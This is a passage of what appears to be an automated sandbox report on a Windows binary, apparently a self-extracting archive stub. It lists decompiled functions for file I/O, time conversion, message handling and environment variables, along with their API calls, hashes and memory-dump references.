				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E00EC2B26() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76); // executed
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E00ED3710(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}















                                                                                                                0x00ec70a4
                                                                                                                0x00ec70ab
                                                                                                                0x00ec70b0
                                                                                                                0x00ec70b5
                                                                                                                0x00ec70b9
                                                                                                                0x00ec70bd
                                                                                                                0x00ec70c1
                                                                                                                0x00ec70c5
                                                                                                                0x00ec70c9
                                                                                                                0x00ec70cd
                                                                                                                0x00ec70d1
                                                                                                                0x00ec70d5
                                                                                                                0x00ec70d9
                                                                                                                0x00ec70dd
                                                                                                                0x00ec70e3
                                                                                                                0x00ec70e7
                                                                                                                0x00ec70fb
                                                                                                                0x00ec718d
                                                                                                                0x00ec718f
                                                                                                                0x00ec7101
                                                                                                                0x00ec710d
                                                                                                                0x00ec712d
                                                                                                                0x00ec713c
                                                                                                                0x00ec714a
                                                                                                                0x00ec7158
                                                                                                                0x00ec7163
                                                                                                                0x00ec7168
                                                                                                                0x00ec716e
                                                                                                                0x00ec7173
                                                                                                                0x00ec7175
                                                                                                                0x00ec7178
                                                                                                                0x00ec710f
                                                                                                                0x00ec7117
                                                                                                                0x00ec711d
                                                                                                                0x00ec7120
                                                                                                                0x00ec7120
                                                                                                                0x00ec7184
                                                                                                                0x00ec7186
                                                                                                                0x00ec7186
                                                                                                                0x00ec7192
                                                                                                                0x00ec7192
                                                                                                                0x00ec7195
                                                                                                                0x00ec7197
                                                                                                                0x00ec71a0

                                                                                                                APIs
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EC70F3
                                                                                                                  • Part of subcall function 00EC2B26: GetVersionExW.KERNEL32(?), ref: 00EC2B4B
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,00EC709E), ref: 00EC7117
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EC712D
                                                                                                                • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00EC713C
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,00EC709E), ref: 00EC714A
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EC7158
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 2092733347-0
                                                                                                                • Opcode ID: 02820f9f7fbae0cc7b77e3a4a2f0f424616d0b8e24c420611fa89cd3d081957c
                                                                                                                • Instruction ID: 7198b824980efff31d594d3505fefb817aa33919004dc2b07a2819985d658ca3
                                                                                                                • Opcode Fuzzy Hash: 02820f9f7fbae0cc7b77e3a4a2f0f424616d0b8e24c420611fa89cd3d081957c
                                                                                                                • Instruction Fuzzy Hash: C531157A90024DAECB00DFE5C984DEFBBB8FF58300F04445AE995E7210E7309A45CB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF645, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ECF645(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00EC7B7C( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                                                                                                                0x00ecf655
                                                                                                                0x00ecf65c
                                                                                                                0x00ecf664
                                                                                                                0x00ecf667
                                                                                                                0x00ecf674
                                                                                                                0x00ecf67b
                                                                                                                0x00ecf683
                                                                                                                0x00ecf689
                                                                                                                0x00ecf689
                                                                                                                0x00ecf68b
                                                                                                                0x00ecf68e
                                                                                                                0x00ecf693
                                                                                                                0x00000000
                                                                                                                0x00ecf693
                                                                                                                0x00ecf69d

                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000050), ref: 00ECF65C
                                                                                                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00ECF693
                                                                                                                  • Part of subcall function 00EC7B7C: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00EC2E91,?,?,?,00EC2E3F,?,-00000002,?,00000000,?), ref: 00EC7B92
                                                                                                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00ECF683
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                • String ID: EDIT$plIw
                                                                                                                • API String ID: 4243998846-1748954997
                                                                                                                • Opcode ID: dfc26b13d8348efb78197cbe74a5506a53f02c35dc53f4b4748c9b08115bde34
                                                                                                                • Instruction ID: 999d5c1a2961d4acf6b89b8914e75ee0672b964f117fb1538915bf48b998f25b
                                                                                                                • Opcode Fuzzy Hash: dfc26b13d8348efb78197cbe74a5506a53f02c35dc53f4b4748c9b08115bde34
                                                                                                                • Instruction Fuzzy Hash: 2DF08232A0132C67D73096659D05F9B776C9B4AB10F050169FA04F6190D671A9039AFA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC1E40, Relevance: 7.6, APIs: 5, Instructions: 116filetimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00EC1E40(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E00ED3370();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00EC1AD9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E00EC674F(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E00EC3399(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














                                                                                                                0x00ec1e40
                                                                                                                0x00ec1e45
                                                                                                                0x00ec1e4b
                                                                                                                0x00ec1e54
                                                                                                                0x00ec1e56
                                                                                                                0x00ec1e61
                                                                                                                0x00ec1e6c
                                                                                                                0x00ec1e68
                                                                                                                0x00ec1e68
                                                                                                                0x00ec1e68
                                                                                                                0x00ec1e72
                                                                                                                0x00ec1e7a
                                                                                                                0x00ec1e82
                                                                                                                0x00ec1e8b
                                                                                                                0x00ec1e8d
                                                                                                                0x00ec1e8d
                                                                                                                0x00ec1e98
                                                                                                                0x00ec1e9d
                                                                                                                0x00ec1e9f
                                                                                                                0x00ec1e9f
                                                                                                                0x00ec1eb4
                                                                                                                0x00ec1eb8
                                                                                                                0x00ec1ec1
                                                                                                                0x00ec1ec3
                                                                                                                0x00ec1ec3
                                                                                                                0x00ec1edc
                                                                                                                0x00ec1ee2
                                                                                                                0x00ec1ee7
                                                                                                                0x00ec1f4b
                                                                                                                0x00ec1f50
                                                                                                                0x00ec1f57
                                                                                                                0x00ec1f60
                                                                                                                0x00ec1f6b
                                                                                                                0x00ec1f6b
                                                                                                                0x00ec1f76
                                                                                                                0x00ec1f79
                                                                                                                0x00ec1f7c
                                                                                                                0x00ec1f7f
                                                                                                                0x00ec1f85
                                                                                                                0x00ec1f96
                                                                                                                0x00ec1f9a
                                                                                                                0x00ec1f9a
                                                                                                                0x00ec1faa
                                                                                                                0x00ec1ee9
                                                                                                                0x00ec1eef
                                                                                                                0x00ec1f0b
                                                                                                                0x00ec1f3a
                                                                                                                0x00ec1f3f
                                                                                                                0x00ec1f41
                                                                                                                0x00ec1f41
                                                                                                                0x00000000
                                                                                                                0x00ec1f3f
                                                                                                                0x00ec1f24
                                                                                                                0x00ec1f26
                                                                                                                0x00ec1f2f
                                                                                                                0x00ec1f31
                                                                                                                0x00ec1f31
                                                                                                                0x00ec1f38
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec1f38

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000), ref: 00EC1EDC
                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000), ref: 00EC1EE9
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00000000,00000003,?,00000000), ref: 00EC1F1E
                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00000000,00000003,?,00000000), ref: 00EC1F26
                                                                                                                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00000000,00000003,?,00000000), ref: 00EC1F6B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateErrorLast$Time
                                                                                                                • String ID:
                                                                                                                • API String ID: 1999340476-0
                                                                                                                • Opcode ID: 60c15676c8fbc140ab3e8a1fa2c56f97ab9b7f2f8c5745092f7103154cba1cd7
                                                                                                                • Instruction ID: 9edd15111e4a39a7a39867570043ce09f56a082a1be8dc4772bec91b4159ba1e
                                                                                                                • Opcode Fuzzy Hash: 60c15676c8fbc140ab3e8a1fa2c56f97ab9b7f2f8c5745092f7103154cba1cd7
                                                                                                                • Instruction Fuzzy Hash: 174135705447866FD3209B208D45FEABBA4BF02328F10175DF8E0A61D2D776998A8B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECFF44, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ECFF44() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xf0ca58; // 0x8020e
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                                                                                                                0x00ecff55
                                                                                                                0x00ecff5d
                                                                                                                0x00ecff66
                                                                                                                0x00ecff6c
                                                                                                                0x00ecff73
                                                                                                                0x00ecff84
                                                                                                                0x00ecff88
                                                                                                                0x00ecff92
                                                                                                                0x00000000
                                                                                                                0x00ecff92
                                                                                                                0x00ecff7a
                                                                                                                0x00ecff82
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecff82
                                                                                                                0x00ecff9c

                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ECFF55
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ECFF66
                                                                                                                • IsDialogMessageW.USER32(0008020E,?), ref: 00ECFF7A
                                                                                                                • TranslateMessage.USER32(?), ref: 00ECFF88
                                                                                                                • DispatchMessageW.USER32(?), ref: 00ECFF92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1266772231-0
                                                                                                                • Opcode ID: 3aee9a675c2972075e7901fd3abfa2d88da57b5ca784f07b114c85736b361701
                                                                                                                • Instruction ID: 07386cbf0f4e554634c8d1f62b8a653fba955cef2839880cd6bc22495317d5ea
                                                                                                                • Opcode Fuzzy Hash: 3aee9a675c2972075e7901fd3abfa2d88da57b5ca784f07b114c85736b361701
                                                                                                                • Instruction Fuzzy Hash: 78F0BD71A0125DABCB20DBA5AC4CEEB7F6CEE062557404519F919D2050E739D506E7F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF6B3, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E00ECF6B3(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00EC69F6(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xf26150(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xf26018( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00ED3334(); // executed
				 *0xf2605c(0xf0ca28,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                                                                                                                0x00ecf6c2
                                                                                                                0x00ecf6c9
                                                                                                                0x00ecf6cc
                                                                                                                0x00ecf6d5
                                                                                                                0x00ecf6dd
                                                                                                                0x00ecf6e4
                                                                                                                0x00ecf6ee
                                                                                                                0x00ecf6f9
                                                                                                                0x00ecf6fd
                                                                                                                0x00ecf700
                                                                                                                0x00ecf703
                                                                                                                0x00ecf70d
                                                                                                                0x00ecf71a

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC69F6: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EC6A11
                                                                                                                  • Part of subcall function 00EC69F6: LoadLibraryW.KERNELBASE(?,?,00EC5706,Crypt32.dll,00000000,00EC578A,?,?,00EC576C,?,?,?,?), ref: 00EC6A33
                                                                                                                • OleInitialize.OLE32(00000000), ref: 00ECF6CC
                                                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00ECF703
                                                                                                                • SHGetMalloc.SHELL32(00F0CA28), ref: 00ECF70D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                • String ID: riched20.dll
                                                                                                                • API String ID: 3498096277-3360196438
                                                                                                                • Opcode ID: a16386f74545d3d2cf2be8c454b8a17fb2e08eeece8a37d9aa36929fcc568a3c
                                                                                                                • Instruction ID: 2b9608b3d3496086473ba68295599d70c8377500b2943b0c88332b475df10a3a
                                                                                                                • Opcode Fuzzy Hash: a16386f74545d3d2cf2be8c454b8a17fb2e08eeece8a37d9aa36929fcc568a3c
                                                                                                                • Instruction Fuzzy Hash: 77F01271D0020DABC720EF99D9499EFFFFCEF94701F00415AE814E2251DBB856069BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2455, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 66%
                                                                                                                			E00ED2455(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E00ED3370();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E00EC6493(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E00EC65AC() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12);
				}
				return _t7;
			}







                                                                                                                0x00ed2455
                                                                                                                0x00ed245d
                                                                                                                0x00ed246b
                                                                                                                0x00ed2480
                                                                                                                0x00ed2485
                                                                                                                0x00ed2489
                                                                                                                0x00ed248e
                                                                                                                0x00ed2498
                                                                                                                0x00ed2491
                                                                                                                0x00ed2491
                                                                                                                0x00ed2497
                                                                                                                0x00ed2497
                                                                                                                0x00ed24a7
                                                                                                                0x00ed24a7
                                                                                                                0x00ed24b1

                                                                                                                APIs
                                                                                                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00ED246B
                                                                                                                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00ED24A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentVariable
                                                                                                                • String ID: sfxcmd$sfxpar
                                                                                                                • API String ID: 1431749950-3493335439
                                                                                                                • Opcode ID: 3f4bf870396c7a28b9dfc28c7ac596ddcec92ef6212912338575288be9f7da31
                                                                                                                • Instruction ID: cee7404b5093ba72fd3db6045c5bedcd1ac9f12c8787c90636e231b0b6f59347
                                                                                                                • Opcode Fuzzy Hash: 3f4bf870396c7a28b9dfc28c7ac596ddcec92ef6212912338575288be9f7da31
                                                                                                                • Instruction Fuzzy Hash: 73F0EC71805338AACB312F95DD45FF6779DEF25B51B00101AFD8876181DA714841CBF1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC1CFE, Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 59%
                                                                                                                			E00EC1CFE(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00EC1E0D(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00EC1CFE(_t25);
						}
					}
				}
				return _t15;
			}







                                                                                                                0x00ec1d01
                                                                                                                0x00ec1d03
                                                                                                                0x00ec1d0a
                                                                                                                0x00ec1d14
                                                                                                                0x00ec1d14
                                                                                                                0x00ec1d26
                                                                                                                0x00ec1d2e
                                                                                                                0x00ec1d8a
                                                                                                                0x00ec1d30
                                                                                                                0x00ec1d32
                                                                                                                0x00ec1d39
                                                                                                                0x00ec1d52
                                                                                                                0x00ec1d56
                                                                                                                0x00ec1d67
                                                                                                                0x00ec1d6b
                                                                                                                0x00ec1d85
                                                                                                                0x00ec1d85
                                                                                                                0x00ec1d77
                                                                                                                0x00ec1d77
                                                                                                                0x00ec1d80
                                                                                                                0x00000000
                                                                                                                0x00ec1d82
                                                                                                                0x00ec1d82
                                                                                                                0x00000000
                                                                                                                0x00ec1d82
                                                                                                                0x00ec1d80
                                                                                                                0x00ec1d58
                                                                                                                0x00ec1d58
                                                                                                                0x00ec1d61
                                                                                                                0x00000000
                                                                                                                0x00ec1d63
                                                                                                                0x00ec1d63
                                                                                                                0x00ec1d63
                                                                                                                0x00ec1d61
                                                                                                                0x00ec1d3b
                                                                                                                0x00ec1d3b
                                                                                                                0x00ec1d43
                                                                                                                0x00000000
                                                                                                                0x00ec1d45
                                                                                                                0x00ec1d45
                                                                                                                0x00ec1d46
                                                                                                                0x00ec1d46
                                                                                                                0x00ec1d4b
                                                                                                                0x00ec1d4b
                                                                                                                0x00ec1d43
                                                                                                                0x00ec1d39
                                                                                                                0x00ec1d92

                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00EC1D0E
                                                                                                                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00EC1D26
                                                                                                                • GetLastError.KERNEL32 ref: 00EC1D58
                                                                                                                • GetLastError.KERNEL32 ref: 00EC1D77
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2244327787-0
                                                                                                                • Opcode ID: a49900cb4e7780c846d10c080fa517a475e48bfa05b06d838dd618f51432b438
                                                                                                                • Instruction ID: ae49fafe67417068b7b7014e2b86f46b494eee49e616f4b4484331c194e55e67
                                                                                                                • Opcode Fuzzy Hash: a49900cb4e7780c846d10c080fa517a475e48bfa05b06d838dd618f51432b438
                                                                                                                • Instruction Fuzzy Hash: FF11C230504608EFEB209F51CA44FA93BA9FB4333AF1095ADF867A5192D7328D469F91
                                                                                                                Uniqueness

